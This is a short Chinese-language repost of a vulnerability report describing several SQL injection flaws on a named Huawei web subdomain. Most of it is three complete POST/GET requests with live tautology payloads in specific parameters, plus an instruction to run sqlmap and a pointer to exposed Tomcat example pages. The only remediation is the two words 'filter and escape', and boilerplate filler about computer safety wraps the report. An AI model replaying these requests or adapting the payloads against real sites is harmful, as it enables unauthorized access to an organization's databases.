华为某站多个sql注入漏洞1

随着网络的普及，我们的生活越来越方便，但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑，更要注意上网安全常识，不然病毒会对我们造成严重的威胁。

华为某站多个sql注入漏洞，你可以在这篇资讯里查看详细的漏洞介绍，而且小编还为大家提供了非常简单的漏洞解决方案。

POST http://softcoreonline.huawei.com/app/front/faq!list.action

appId=402880823c1e6e77013c1e79016a0003&pager.keyword=-1' or 1=1 or 'aaa'='aaa&pager.orderBy=createDate&pager.orderType=desc&pager.pageNumber=1&pager.property=questions&type=

参数：pager.keyword

华为某站多个sql注入漏洞

另两处：

POST http://softcoreonline.huawei.com/front/faq!list.action

appId=402880e53c0df5db013c0df743310001&pager.keyword=-1' OR 1=11 or 'aaa'='aaa&pager.orderBy=createDate&pager.orderType=desc&pager.pageNumber=1&pager.property=questions&type=

http://softcoreonline.huawei.com/app/front/app!checkMobile.action?appIds=402880823c1e6e77013c1e7710e50001,402880e43c0b3094013c0b31465b0001,402880823c1e6e77013c1e79016a0003,402880e53c0df5db013c0df743310001&applyInfo.mobile=-1' or 1=1 or 'aaa'='aaa

sqlmap跑下

华为某站多个sql注入漏洞

另删下Tomcat exampleshttp://softcoreonline.huawei.com/examples/servlets/index.html

解决方案：

过滤转义。

上面是电脑上网安全的一些基础常识，学习了安全知识，几乎可以让你免费电脑中毒的烦扰。

……

标签:华为某站多个sql注入漏洞